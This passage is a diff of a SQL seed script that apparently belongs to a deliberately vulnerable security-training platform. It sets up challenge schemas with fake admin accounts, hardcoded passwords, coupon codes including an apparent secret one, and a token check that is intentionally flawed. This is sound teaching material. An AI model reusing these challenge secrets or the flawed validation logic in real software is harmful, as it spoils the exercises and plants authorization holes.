 -- Data for table `CryptShop`.`coupons`
 -- -----------------------------------------------------
 START TRANSACTION;
-USE
-`CryptShop`;
-INSERT INTO `CryptShop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`)
-VALUES (1, 100, 'PleaseTakeAFruit', 3);
-INSERT INTO `CryptShop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`)
-VALUES (2, 100, 'FruitForFree', 3);
-INSERT INTO `CryptShop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`)
-VALUES (3, 10, 'PleaseTakeAnOrange', 2);
-INSERT INTO `CryptShop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`)
-VALUES (4, 50, 'HalfOffOranges', 2);
-INSERT INTO `CryptShop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`)
-VALUES (5, 10, 'PleaseTakeABanana', 4);
-INSERT INTO `CryptShop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`)
-VALUES (6, 50, 'HalfOffBananas', 4);
-INSERT INTO `CryptShop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`)
-VALUES (432197, 100, 'e!c!3etZoumo@Stu4rU176', 2);
+USE `CryptShop`;
+INSERT INTO `CryptShop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`) VALUES (1, 100, 'PleaseTakeAFruit', 3);
+INSERT INTO `CryptShop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`) VALUES (2, 100, 'FruitForFree', 3);
+INSERT INTO `CryptShop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`) VALUES (3, 10, 'PleaseTakeAnOrange', 2);
+INSERT INTO `CryptShop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`) VALUES (4, 50, 'HalfOffOranges', 2);
+INSERT INTO `CryptShop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`) VALUES (5, 10, 'PleaseTakeABanana', 4);
+INSERT INTO `CryptShop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`) VALUES (6, 50, 'HalfOffBananas', 4);
+INSERT INTO `CryptShop`.`coupons` (`couponId`, `perCentOff`, `couponCode`, `itemId`) VALUES (432197, 100, 'e!c!3etZoumo@Stu4rU176', 2);
 COMMIT;
 
 -- -----------------------------------------------------
@@ -1518,99 +845,53 @@ COMMIT;
 -- Failure to Restrict URL Access Challenge Three Schema
 -- -----------------------------------------------------
 -- -----------------------------------------------------
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
 
-DROP SCHEMA IF EXISTS `UrlAccessThree`;
-CREATE SCHEMA IF NOT EXISTS `UrlAccessThree` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;
-USE
-`UrlAccessThree` ;
+DROP SCHEMA IF EXISTS `UrlAccessThree` ;
+CREATE SCHEMA IF NOT EXISTS `UrlAccessThree` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci ;
+USE `UrlAccessThree` ;
 
 -- -----------------------------------------------------
 -- Table `UrlAccessThree`.`users`
 -- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `UrlAccessThree`.`users`
-(
-    `userId`
-    INT
-    NOT
-    NULL,
-    `userName`
-    VARCHAR
-(
-    32
-) NOT NULL ,
-    `userPassword` VARCHAR
-(
-    128
-) NOT NULL ,
-    `userAddress` VARCHAR
-(
-    128
-) NOT NULL ,
-    `userRole` VARCHAR
-(
-    32
-) NOT NULL,
-    PRIMARY KEY
-(
-    `userId`
-) )
-    ENGINE = InnoDB;
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+CREATE  TABLE IF NOT EXISTS `UrlAccessThree`.`users` (
+  `userId` INT NOT NULL ,
+  `userName` VARCHAR(32) NOT NULL ,
+  `userPassword` VARCHAR(128) NOT NULL ,
+  `userAddress` VARCHAR(128) NOT NULL ,
+  `userRole` VARCHAR(32) NOT NULL,
+  PRIMARY KEY (`userId`) )
+ENGINE = InnoDB;
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
 
 -- -----------------------------------------------------
 -- Data for table `UrlAccessThree`.`users`
 -- -----------------------------------------------------
 START TRANSACTION;
-USE
-`UrlAccessThree`;
-INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (1223, 'aGuest', '!14897-hs.alNj.kFim81', 'zoidberg23@shepherd.com', 'guest');
-INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (1224, 'manager', '!14897-hs.alNj.kFim81', 'zoidberg23@shepherd.com', 'admin');
-INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (1225, 'sean', '!14897-hs.alNj.kFim81', 'zoidberg24@shepherd.com', 'admin');
-INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (3214, 'administrator', '!14897-hs.alNj.kFim81', 'buzzthebald@shepherd.com', 'admin');
-INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (3212, 'root', '!14897-hs.alNj.kFim81', 'elitehacker@shepherd.com', 'admin');
-INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (6344, 'superuser', '!14897-hs.alNj.kFim81', 'superman@security.com', 'admin');
-INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (6345, 'MrJohnReillyTheSecond', '!14897-hs.alNj.kFim81', 'MrJohnReillyTheSecond@security.com', 'superadmin');
-INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (6346, 'megauser', '!14897-hs.alNj.kFim81', 'megaman@security.com', 'admin');
-INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (6347, 'hyperuser', '!14897-hs.alNj.kFim81', 'hmegaman@security.com', 'admin');
-INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (6348, 'godzilla', '!14897-hs.alNj.kFim81', 'godzilla@security.com', 'admin');
-INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (6349, 'kinguser', '!14897-hs.alNj.kFim81', 'kinguser@security.com', 'admin');
-INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (4524, 'privileged', '1489!72hsfalkjlkfi381', 'spoiltbrat@security.com', 'admin');
-INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (6343, 'mark', '148!97-hs.alNj.kFim81', 'superman2@security.com', 'admin');
-INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (6342, 'markdenihan', '148!97-hs.alNj.kFim81', 'superman3@security.com', 'admin');
-INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (6341, 'seanduggan', '148972!hsfalkjlkfi381', 'superman4@security.com', 'admin');
-INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (6551, 'rootuser', '14897!2hsfalkjlkfi381', 'superman6@security.com', 'admin');
-INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (6552, 'adminuser', '1489!72hsfalkjlkfi381', 'superman7@security.com', 'admin');
-INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`)
-VALUES (6559, 'shepherd', '148972hsfalk!jlkfi381', 'superman8@security.com', 'admin');
+USE `UrlAccessThree`;
+INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (1223, 'aGuest', 		'!14897-hs.alNj.kFim81', 'zoidberg23@shepherd.com', 'guest');
+INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (1224, 'manager', 		'!14897-hs.alNj.kFim81', 'zoidberg23@shepherd.com', 'admin');
+INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (1225, 'sean',	 		'!14897-hs.alNj.kFim81', 'zoidberg24@shepherd.com', 'admin');
+INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (3214, 'administrator', 	'!14897-hs.alNj.kFim81', 'buzzthebald@shepherd.com', 'admin');
+INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (3212, 'root', 			'!14897-hs.alNj.kFim81', 'elitehacker@shepherd.com', 'admin');
+INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (6344, 'superuser', 		'!14897-hs.alNj.kFim81', 'superman@security.com', 'admin');
+INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (6345, 'MrJohnReillyTheSecond', 		'!14897-hs.alNj.kFim81', 'MrJohnReillyTheSecond@security.com', 'superadmin');
+INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (6346, 'megauser', 		'!14897-hs.alNj.kFim81', 'megaman@security.com', 'admin');
+INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (6347, 'hyperuser', 		'!14897-hs.alNj.kFim81', 'hmegaman@security.com', 'admin');
+INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (6348, 'godzilla', 		'!14897-hs.alNj.kFim81', 'godzilla@security.com', 'admin');
+INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (6349, 'kinguser', 		'!14897-hs.alNj.kFim81', 'kinguser@security.com', 'admin');
+INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (4524, 'privileged', 		'1489!72hsfalkjlkfi381', 'spoiltbrat@security.com', 'admin');
+INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (6343, 'mark', 			'148!97-hs.alNj.kFim81', 'superman2@security.com', 'admin');
+INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (6342, 'markdenihan', 	'148!97-hs.alNj.kFim81', 'superman3@security.com', 'admin');
+INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (6341, 'seanduggan', 		'148972!hsfalkjlkfi381', 'superman4@security.com', 'admin');
+INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (6551, 'rootuser', 		'14897!2hsfalkjlkfi381', 'superman6@security.com', 'admin');
+INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (6552, 'adminuser', 		'1489!72hsfalkjlkfi381', 'superman7@security.com', 'admin');
+INSERT INTO `UrlAccessThree`.`users` (`userId`, `userName`, `userPassword`, `userAddress`, `userRole`) VALUES (6559, 'shepherd', 		'148972hsfalk!jlkfi381', 'superman8@security.com', 'admin');
 
 COMMIT;
 
@@ -1620,112 +901,61 @@ COMMIT;
 -- -----------------------------------------------------
 -- -----------------------------------------------------
 
-DROP SCHEMA IF EXISTS `sqlInjectSeven`;
-CREATE SCHEMA IF NOT EXISTS `sqlInjectSeven` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci;
-USE
-`sqlInjectSeven`;
+DROP SCHEMA IF EXISTS `sqlInjectSeven` ;
+CREATE SCHEMA IF NOT EXISTS `sqlInjectSeven` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci ;
+USE `sqlInjectSeven`;
 
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL';
 
 
 -- -----------------------------------------------------
 -- Table `sqlInjectSeven`.`users`
 -- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `sqlInjectSeven`.`users`
-(
-    `userId`
-    INT
-    NOT
-    NULL,
-    `userName`
-    VARCHAR
-(
-    32
-) NOT NULL ,
-    `userPassword` VARCHAR
-(
-    128
-) NOT NULL ,
-    `userEmail` VARCHAR
-(
-    128
-) NOT NULL ,
-    `userRole` VARCHAR
-(
-    8
-) NOT NULL DEFAULT 'default' ,
-    PRIMARY KEY
-(
-    `userId`
-) )
-    ENGINE = InnoDB;
-
-
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+CREATE  TABLE IF NOT EXISTS `sqlInjectSeven`.`users` (
+  `userId` INT NOT NULL ,
+  `userName` VARCHAR(32) NOT NULL ,
+  `userPassword` VARCHAR(128) NOT NULL ,
+  `userEmail` VARCHAR(128) NOT NULL ,
+  `userRole` VARCHAR(8) NOT NULL DEFAULT 'default' ,
+  PRIMARY KEY (`userId`) )
+ENGINE = InnoDB;
+
+
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
 
 -- -----------------------------------------------------
 -- Data for table `sqlInjectSeven`.`users`
 -- -----------------------------------------------------
 START TRANSACTION;
-USE
-`sqlInjectSeven`;
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (40, 'User 1', 'de1027fnNys6687as!283619fj1237fault', 'UserJohn1@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (41, 'User 2', 'd128361027fnNys6687as!9fj1237efault', 'UserJim2@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (42, 'User 3', 'defa1283619f027fnNys6687as!j1237ult', 'UserJone3@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (43, 'User 4', 'd1283619fj12027fnNys6687as!37efault', 'UserBell4@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (44, 'User 5', 'defau1283619fj1237lt', 'UserConan5@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (45, 'User 6', 'de1283619fj1237fault', 'UserSmioth6@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (46, 'User 7', 'def1d88027fnNys6687as!sd&dsault', 'UserHat7@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (47, 'User 8', 'def1d027fnNys6687as!88sd&dsault', 'UserPage8@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (48, 'User 9', 'defaul027fnNys6687as!1d88sd&dst', 'UserCube9@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (49, 'User 11', 'd1d88027fnNys6687as!sd&dsefault', 'MrsJohn1@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (50, 'User 12', 'defau027fnNys6687as!l1d88sd&dst', 'MrsJim2@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (51, 'User 13', 'def_926diUUscnaosOault', 'MrsJone3@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (52, 'User 14', 'd_926diUUscnaosOefault', 'MrsBell4@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (53, 'User 15', 'defaul_926diUUscnaosOt', 'MrsConan5@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (54, 'User 16', 'de_926diUUscnaosOfault', 'MrsSmioth6@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (55, 'User 17', 'defaul_926diUUscnaosOt', 'MrsHat7@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (56, 'User 18', 'de_926diUUscnaosOfault', 'MrsPage8@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (57, 'User 19', 'defa_926diUUscnaosOult', 'MrsCube9@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (58, 'User 20', 'd_926diUUscnaosOefault', 'Mr20@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (59, 'User 21', 'defa1027fnNys6687as!ult', 'Mr2John1@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (60, 'User 22', 'de027fnNys6687as!fault', 'Mr2Jim2@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (61, 'User 23', 'defau027fnNys6687as!lt', 'Mr2Jone3@User.com', 'default');
-INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`)
-VALUES (62, 'User 10', 'def027fnNys6687as!ault', 'Mrs0@User.com', 'default');
+USE `sqlInjectSeven`;
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (40, 'User 1', 'de1027fnNys6687as!283619fj1237fault', 'UserJohn1@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (41, 'User 2', 'd128361027fnNys6687as!9fj1237efault', 'UserJim2@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (42, 'User 3', 'defa1283619f027fnNys6687as!j1237ult', 'UserJone3@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (43, 'User 4', 'd1283619fj12027fnNys6687as!37efault', 'UserBell4@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (44, 'User 5', 'defau1283619fj1237lt', 'UserConan5@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (45, 'User 6', 'de1283619fj1237fault', 'UserSmioth6@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (46, 'User 7', 'def1d88027fnNys6687as!sd&dsault', 'UserHat7@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (47, 'User 8', 'def1d027fnNys6687as!88sd&dsault', 'UserPage8@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (48, 'User 9', 'defaul027fnNys6687as!1d88sd&dst', 'UserCube9@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (49, 'User 11', 'd1d88027fnNys6687as!sd&dsefault', 'MrsJohn1@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (50, 'User 12', 'defau027fnNys6687as!l1d88sd&dst', 'MrsJim2@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (51, 'User 13', 'def_926diUUscnaosOault', 'MrsJone3@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (52, 'User 14', 'd_926diUUscnaosOefault', 'MrsBell4@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (53, 'User 15', 'defaul_926diUUscnaosOt', 'MrsConan5@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (54, 'User 16', 'de_926diUUscnaosOfault', 'MrsSmioth6@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (55, 'User 17', 'defaul_926diUUscnaosOt', 'MrsHat7@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (56, 'User 18', 'de_926diUUscnaosOfault', 'MrsPage8@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (57, 'User 19', 'defa_926diUUscnaosOult', 'MrsCube9@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (58, 'User 20', 'd_926diUUscnaosOefault', 'Mr20@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (59, 'User 21', 'defa1027fnNys6687as!ult', 'Mr2John1@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (60, 'User 22', 'de027fnNys6687as!fault', 'Mr2Jim2@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (61, 'User 23', 'defau027fnNys6687as!lt', 'Mr2Jone3@User.com', 'default');
+INSERT INTO `sqlInjectSeven`.`users` (`userId`, `userName`, `userPassword`, `userEmail`, `userRole`) VALUES (62, 'User 10', 'def027fnNys6687as!ault', 'Mrs0@User.com', 'default');
 
 COMMIT;
 
@@ -1735,79 +965,44 @@ COMMIT;
 -- -----------------------------------------------------
 -- -----------------------------------------------------
 
-SET
-@OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
-SET
-@OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
-SET
-@OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';
+SET @OLD_UNIQUE_CHECKS=@@UNIQUE_CHECKS, UNIQUE_CHECKS=0;
+SET @OLD_FOREIGN_KEY_CHECKS=@@FOREIGN_KEY_CHECKS, FOREIGN_KEY_CHECKS=0;
+SET @OLD_SQL_MODE=@@SQL_MODE, SQL_MODE='TRADITIONAL,ALLOW_INVALID_DATES';
 
-DROP SCHEMA IF EXISTS `securityMisconfigStealToken`;
-CREATE SCHEMA IF NOT EXISTS `securityMisconfigStealToken` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci;
-USE
-`securityMisconfigStealToken` ;
+DROP SCHEMA IF EXISTS `securityMisconfigStealToken` ;
+CREATE SCHEMA IF NOT EXISTS `securityMisconfigStealToken` DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci ;
+USE `securityMisconfigStealToken` ;
 
 -- -----------------------------------------------------
 -- Table `securityMisconfigStealToken`.`tokens`
 -- -----------------------------------------------------
-CREATE TABLE IF NOT EXISTS `securityMisconfigStealToken`.`tokens`
-(
-    `idtokens`
-    INT
-    NOT
-    NULL
-    AUTO_INCREMENT,
-    `userId`
-    VARCHAR
-(
-    64
-) NULL,
-    `token` VARCHAR
-(
-    64
-) NULL,
-    PRIMARY KEY
-(
-    `idtokens`
-),
-    UNIQUE INDEX `userId_UNIQUE`
-(
-    `userId` ASC
-),
-    UNIQUE INDEX `token_UNIQUE`
-(
-    `token` ASC
-))
-    ENGINE = InnoDB;
-
-
-SET
-SQL_MODE=@OLD_SQL_MODE;
-SET
-FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
-SET
-UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
+CREATE TABLE IF NOT EXISTS `securityMisconfigStealToken`.`tokens` (
+  `idtokens` INT NOT NULL AUTO_INCREMENT,
+  `userId` VARCHAR(64) NULL,
+  `token` VARCHAR(64) NULL,
+  PRIMARY KEY (`idtokens`),
+  UNIQUE INDEX `userId_UNIQUE` (`userId` ASC),
+  UNIQUE INDEX `token_UNIQUE` (`token` ASC))
+ENGINE = InnoDB;
+
+
+SET SQL_MODE=@OLD_SQL_MODE;
+SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS;
+SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS;
 
 -- getToken Procedure
-USE
-`securityMisconfigStealToken`;
+USE `securityMisconfigStealToken`;
 -- DELIMITER $$
-CREATE PROCEDURE `securityMisconfigStealToken`.`getToken`(IN theUserId VARCHAR (64))
+CREATE PROCEDURE `securityMisconfigStealToken`.`getToken` (IN theUserId VARCHAR(64))
 BEGIN
-DECLARE
-tokenExists INT;
+DECLARE tokenExists INT;
 COMMIT;
-SELECT count(token)
-FROM `securityMisconfigStealToken`.`tokens`
-WHERE userId = theUserId INTO tokenExists;
-IF
-(tokenExists < 1) THEN
+SELECT count(token) FROM `securityMisconfigStealToken`.`tokens` WHERE userId = theUserId INTO tokenExists;
+IF (tokenExists < 1) THEN
 	INSERT INTO tokens (userId, token) VALUES (theUserId, SHA2(CONCAT(RAND(), now()), 256));
-COMMIT;
+	COMMIT;
 END IF;
-SELECT token
-FROM tokens
-WHERE userId = theUserId;
+SELECT token FROM tokens WHERE userId = theUserId;
 END
 ;
 -- $$
@@ -1815,15 +1010,12 @@ END
 -- DELIMITER ;
 
 -- validToken Procedure
-USE
-`securityMisconfigStealToken`;
+USE `securityMisconfigStealToken`;
 -- DELIMITER $$
-CREATE PROCEDURE `securityMisconfigStealToken`.`validToken`(IN theUserId VARCHAR (64), theToken VARCHAR (64))
+CREATE PROCEDURE `securityMisconfigStealToken`.`validToken` (IN theUserId VARCHAR(64), theToken VARCHAR(64))
 BEGIN
 COMMIT;
-SELECT count(token)
-FROM `securityMisconfigStealToken`.`tokens`
-WHERE userId != theUserId AND token = theToken;
+SELECT count(token) FROM `securityMisconfigStealToken`.`tokens` WHERE userId != theUserId AND token = theToken;
 END
 ;
 -- $$
@@ -1837,79 +1029,47 @@ COMMIT;
 -- DirectObjectBank Schema
 -- -----------------------------------------------------
 -- -----------------------------------------------------
-SET
